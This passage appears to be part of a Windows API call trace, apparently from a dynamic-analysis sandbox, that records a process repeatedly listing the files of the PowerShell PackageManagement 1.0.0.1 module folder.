lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2c10 [0283.004] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.004] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0283.004] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.004] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0283.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0283.005] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.005] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.005] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0283.006] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0283.006] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0283.006] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.007] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.007] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0283.007] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0283.007] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0283.007] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0283.008] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0283.008] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0283.008] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0283.009] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0283.009] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0283.009] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0283.009] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0283.010] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0283.010] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0283.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.011] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.011] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0283.011] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0283.011] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0283.011] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0283.012] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0283.012] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0283.012] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0283.012] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0283.012] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0283.013] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0283.013] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0283.013] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.013] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0283.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0283.014] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0283.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0283.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0283.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0283.014] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd25b0 [0283.014] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.015] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: 